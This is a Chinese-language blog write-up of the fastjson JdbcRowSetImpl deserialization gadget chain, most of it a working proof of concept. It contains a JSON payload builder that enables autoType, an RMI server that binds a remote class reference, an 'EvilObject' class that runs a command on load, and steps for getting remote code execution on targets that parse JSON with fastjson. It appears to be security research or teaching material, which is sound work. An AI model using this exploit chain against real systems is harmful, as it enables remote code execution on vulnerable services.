fastjson反序列化-JdbcRowSetImpl利用鏈
阿新 • • 發佈:2021-10-20
fastjson反序列化-JdbcRowSetImpl利用鏈
JdbcRowSetImpl利用鏈
fastjson反序列化JdbcRowSetImpl - Afant1 - 部落格園 (cnblogs.com)
這裡涉及了JNDI與RMI的概念。
其本質為JNDI注入。
附上示例程式碼
JdbcRowSetImplPoC.java
package org.lain.poc.poclist; import com.alibaba.fastjson.JSONObject; import com.alibaba.fastjson.parser.ParserConfig; /** * @author: ZH3FENG * @Date: 下午7:53 2017/12/11 * @Modified By: * @Description: Gadget com.sun.rowset.JdbcRowSetImpl * * setAutoCommit() -> connect() -> InitialContext.lookup() */ public class JdbcRowSetImplPoC { public static void testJdbcRowSetImpl(String dataSourceName){ ParserConfig config = new ParserConfig(); config.setAutoTypeSupport(true);// String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\"," + "\"dataSourceName\":\"" + dataSourceName + "\"," + "\"autoCommit\":\"true\"}"; System.out.println(payload); try{ JSONObject.parse(payload,config); }catch (Exception e){ e.printStackTrace(); } } }
RMIServer.java
package org.lain.poc.jndi; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.Reference; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; /** * @author: lanqihe * @Date: 下午8:01 2017/12/11 * @Modified By: * @Description: 本地註冊一個register,並將惡意的類繫結 */ public class RMIServer { public static void main(String argv[]) { try { Registry registry = LocateRegistry.createRegistry(1090); //如果通過rmi無法找到org.lain.poc.jndi.EvilObjectFactory,則嘗試從factoryLocation 獲取 //因此,本地測試的話,如果factory正確,factoryLocation隨便填 //把一個物件繫結到rmi登錄檔中,這個物件需要繼承UnicastRemoteObject,但是Reference沒有繼承它,所以我們還需要封裝一下它,用 ReferenceWrapper 包裹一下Reference例項物件,這樣就可以將其繫結到rmi登錄檔,並被遠端訪問到了 Reference reference = new Reference("EvilObject", "org.lain.poc.jndi.EvilObjectFactory", "http://localhost:9999/" ); //客戶端通過evil查詢,獲取到EvilObject registry.bind("evil", new ReferenceWrapper(reference)); System.out.println("Ready!"); System.out.println("Waiting for connection......"); } catch (Exception e) { System.out.println("RMIServer: " + e.getMessage()); e.printStackTrace(); } } }
EvilObject.java
package org.lain.poc.jndi; import java.io.IOException; /** * @author: ZH3FENG * @Date: 上午10:18 2017/12/12 * @Modified By: * @Description: 模擬一個惡意類,靜態程式碼塊執行命令 */ public class EvilObject { public EvilObject(){ System.out.println("Hi!"); } /** * 簡單的命令執行 */ static { try { Runtime.getRuntime().exec("calc"); }catch (IOException e){ //ignore } } }
我們在JSONObject.parse方法下斷點除錯
還是呼叫了parse.Object,步入
呼叫deserialze方法,進行反序列化
接下來會對JdbcRowSetImpl進行 初始化
在呼叫完建構函式後,parseObject還會去呼叫set方法。
根據poc的欄位,可以在setDataSourceName與setAutoCommit下斷點。
發現確實呼叫了這兩個函式,在setDataSourceName方法中設定了資料來源,setAutoCommit方法中,呼叫了connect方法。
connect方法
lookup方法
decodeObject中就是解析reference,之後呼叫getOnjectInstance去例項化物件。
呼叫流程總結:
具體利用方法:
Fastjson反序列化漏洞利用 - 簡書 (jianshu.com)
搭建一個rmi伺服器和一個http伺服器
將exp類部署到http伺服器上。
如果目標網站存在fastjson包,且有json格式資料的輸入點。則可以構造json資料,達到遠端呼叫http伺服器上的類,造成命令執行。